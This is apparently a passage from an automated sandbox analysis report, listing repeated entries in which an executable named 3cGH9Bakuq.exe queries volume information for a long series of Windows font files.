            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
